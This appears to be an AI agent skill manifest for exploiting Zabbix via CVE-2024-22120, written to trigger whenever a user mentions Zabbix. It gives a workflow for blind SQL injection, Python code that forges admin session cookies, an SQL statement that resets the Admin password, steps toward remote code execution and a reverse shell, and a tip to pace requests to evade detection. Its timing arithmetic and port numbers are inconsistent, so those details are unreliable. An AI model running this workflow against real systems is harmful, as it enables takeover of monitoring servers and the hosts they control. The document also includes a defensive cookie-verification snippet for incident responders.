Hacktricks-skills zabbix-pentest

Zabbix security assessment and exploitation. Use this skill whenever the user mentions Zabbix monitoring, CVE-2024-22120, Zabbix SQLi, Zabbix cookie forgery, Zabbix RCE, or any Zabbix-related security testing. Trigger for Zabbix web UI assessment, port 10051/10050 enumeration, session cookie analysis, blind SQLi exploitation, admin privilege escalation, and post-exploitation activities on Zabbix infrastructure.

Install

Clone the upstream repo:

```bash
git clone https://github.com/abelrguezr/hacktricks-skills
```

Manifest: skills/network-services-pentesting/pentesting-web/zabbix/SKILL.MD

Source content

Zabbix Security Assessment

A skill for assessing Zabbix monitoring infrastructure, exploiting CVE-2024-22120, and performing post-exploitation activities.

When to Use This Skill

Use this skill when:

  • Assessing Zabbix monitoring systems (web UI or server ports)
  • Investigating CVE-2024-22120 vulnerabilities
  • Analyzing or forging Zabbix session cookies
  • Performing time-based blind SQLi against Zabbix server
  • Escalating from low-priv to admin access in Zabbix
  • Executing scripts or achieving RCE via Zabbix
  • Capturing credentials or pivoting from Zabbix access

Quick Start

```bash
# Full automated exploit (requires low-priv sessionid)
python scripts/zabbix_exploit.py --target zabbix.example.tld --sid <low-priv-sessionid>

# Manual exploitation steps
python scripts/zabbix_sqli.py --target zabbix.example.tld --port 10051 --sid <sessionid> --hostid 10084 --scriptid 1
```

Zabbix Architecture

Zabbix exposes three attack surfaces:

| Component | Port   | Protocol  | Notes                     |
|-----------|--------|-----------|---------------------------|
| Web UI    | 80/443 | HTTP(S)   | Login, session management |
| Server    | 10051  | ZBXD/JSON | Audit log SQLi vector     |
| Agent     | 10080  | ZBXD/JSON | Agent communication       |

Exploitation Workflow

Phase 1: Reconnaissance

  1. Identify Zabbix installation
     • Look for `/zabbix.php` endpoints
     • Check for `zbx_session` cookies
     • Scan ports 10050/10051
  2. Obtain low-priv sessionid
     • Log in as guest or a low-priv user via the web UI
     • Decode the `zbx_session` cookie (Base64)
     • Extract the `sessionid` field (32 hex chars)
  3. Discover hostid and scriptid
     • Navigate to Monitoring → Hosts in the web UI
     • Intercept requests to find the `hostid` (default: 10084)
     • Check the script menu for available `scriptid` values (1, 2 often allowed)

Phase 2: CVE-2024-22120 Exploitation

The vulnerability allows time-based blind SQLi via the Zabbix server port when executing scripts.

Attack flow:

  1. Send a crafted `command` request to port 10051
  2. Inject the SQL payload in the `clientip` field
  3. Measure response time to brute-force secrets
  4. Extract `session_key` and the admin `sessionid`
  5. Forge the admin cookie

Use the bundled script:

```bash
python scripts/zabbix_sqli.py \
  --target zabbix.example.tld \
  --port 10051 \
  --sid <low-priv-sessionid> \
  --hostid 10084 \
  --scriptid 1 \
  --extract session_key \
  --timeout-true 10 \
  --timeout-false 1
```

Phase 3: Admin Access

Once you have `session_key` and the admin `sessionid`:

```bash
python scripts/zabbix_cookie.py \
  --session-key <32-hex-key> \
  --session-id <admin-sessionid> \
  --output cookie.txt
```

Set the `zbx_session` cookie in your browser and access `/zabbix.php?action=dashboard.view`.

Phase 4: Post-Exploitation

Execute scripts on monitored hosts:

  • Use the Admin UI to run predefined scripts
  • Scripts execute as the `zabbix` user on target hosts
  • Can achieve a reverse shell if command execution is available

Alternative: Reset Admin password

If you have database access:

```sql
UPDATE users SET passwd='$2a$10$ZXIvHAEP2ZM.dLXTm6uPHOMVlARXX7cqjbhM6Fn0cANzkCQBWpMrS' WHERE username='Admin';
```

This sets the password to `zabbix`.

Cookie Format

The `zbx_session` cookie structure:

```python
import base64
import hashlib
import hmac
import json
import time

session_key = "<32-hex-key>"   # session_key recovered in Phase 2

# Data payload
data = {
    "sessionid": "<32-hex>",
    "serverCheckResult": True,
    "serverCheckTime": int(time.time()),
}

# Signature: hex HMAC-SHA256 over the compact JSON with keys sorted,
# matching Zabbix's ksort() + json_encode() before hash_hmac()
sign = hmac.new(
    key=session_key.encode(),
    msg=json.dumps(data, sort_keys=True, separators=(",", ":")).encode(),
    digestmod=hashlib.sha256,
).hexdigest()

# Final cookie: Base64 of the payload with the signature appended
zbx_session = base64.b64encode(
    json.dumps({**data, "sign": sign}, separators=(",", ":")).encode()
).decode()
```
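As an added example (not part of this skill or of Zabbix's own code), the inverse operation: decoding a `zbx_session` cookie and verifying its signature exactly as the server does, which lets a responder check cookies recovered during an investigation and shows why rotating `session_key` after a CVE-2024-22120 compromise invalidates every previously issued or forged cookie. It assumes the signing scheme shown above (hex HMAC-SHA256 over compact, key-sorted JSON); every key and session value below is constructed.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

def _sign(payload: dict, session_key: str) -> str:
    """Hex HMAC-SHA256 over compact, key-sorted JSON, as Zabbix computes it."""
    canonical = json.dumps(payload, sort_keys=True, separators=(",", ":"))
    return hmac.new(session_key.encode(), canonical.encode(), hashlib.sha256).hexdigest()

def verify_zbx_session(cookie: str, session_key: str) -> Optional[dict]:
    """Decode a zbx_session cookie and check its signature against session_key.

    Returns the payload (without "sign") only when the signature verifies;
    returns None for malformed input, an edited field or a key mismatch.
    """
    try:
        payload = json.loads(base64.b64decode(cookie, validate=True))
    except (ValueError, TypeError):
        return None
    if not isinstance(payload, dict) or not isinstance(payload.get("sign"), str):
        return None
    presented = payload.pop("sign")
    if not presented.isascii() or not hmac.compare_digest(_sign(payload, session_key), presented):
        return None
    sid = payload.get("sessionid")
    if not isinstance(sid, str) or len(sid) != 32:
        return None
    return payload

def make_cookie(sessionid: str, session_key: str, check_time: int) -> str:
    """Build a cookie the way Zabbix does; used here only to construct sample input."""
    data = {"sessionid": sessionid, "serverCheckResult": True, "serverCheckTime": check_time}
    data["sign"] = _sign(data, session_key)
    return base64.b64encode(json.dumps(data, separators=(",", ":")).encode()).decode()

def with_sessionid_replaced(cookie: str, sessionid: str) -> str:
    """Edit the sessionid in a cookie without re-signing, to show verification fails."""
    payload = json.loads(base64.b64decode(cookie))
    payload["sessionid"] = sessionid
    return base64.b64encode(json.dumps(payload, separators=(",", ":")).encode()).decode()

# Constructed sample values, not taken from any real instance
OLD_KEY = "0" * 32                 # session_key in use when the cookie was issued
NEW_KEY = "1" * 32                 # session_key after an administrator rotates it
SAMPLE_COOKIE = make_cookie("a" * 32, OLD_KEY, 1700000000)
```

Verifying `SAMPLE_COOKIE` under `OLD_KEY` returns its payload, while the same cookie under `NEW_KEY`, or a copy whose `sessionid` was edited, is rejected.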

Timing Attack Parameters

| Parameter | Recommended Value | Purpose                         |
|-----------|-------------------|---------------------------------|
| T_TRUE    | 8-12 seconds      | Delay when condition is true    |
| T_FALSE   | 1-2 seconds       | Delay when condition is false   |
| Charset   | 0-9a-f            | Hex characters for session keys |
| Length    | 32 chars          | Session key and sessionid length |

Operational Tips

  • Validate scriptid: Ensure the scriptid is permitted for your role before brute-forcing
  • Cache results: Save recovered admin sessionid for reuse
  • Rate limiting: Add delays between requests to avoid detection
  • Connection pooling: Reuse TCP connections when possible
  • Error handling: Handle connection timeouts gracefully

Bundled Scripts

| Script                    | Purpose                      |
|---------------------------|------------------------------|
| scripts/zabbix_frame.py   | Frame ZBXD protocol messages |
| scripts/zabbix_sqli.py    | Time-based SQLi brute-force  |
| scripts/zabbix_cookie.py  | Forge admin session cookies  |
| scripts/zabbix_exploit.py | Full exploit orchestration   |

References

Affected Versions

  • 6.0.0–6.0.27
  • 6.4.0–6.4.12
  • 7.0.0alpha1

Safety Notes

  • Only use on systems you have authorization to test
  • Time-based attacks can be slow (32 chars × 16 possibilities × 10s = ~5 minutes per secret)
  • Monitor for rate limiting or IDS alerts
  • Clean up any credential capture hooks after testing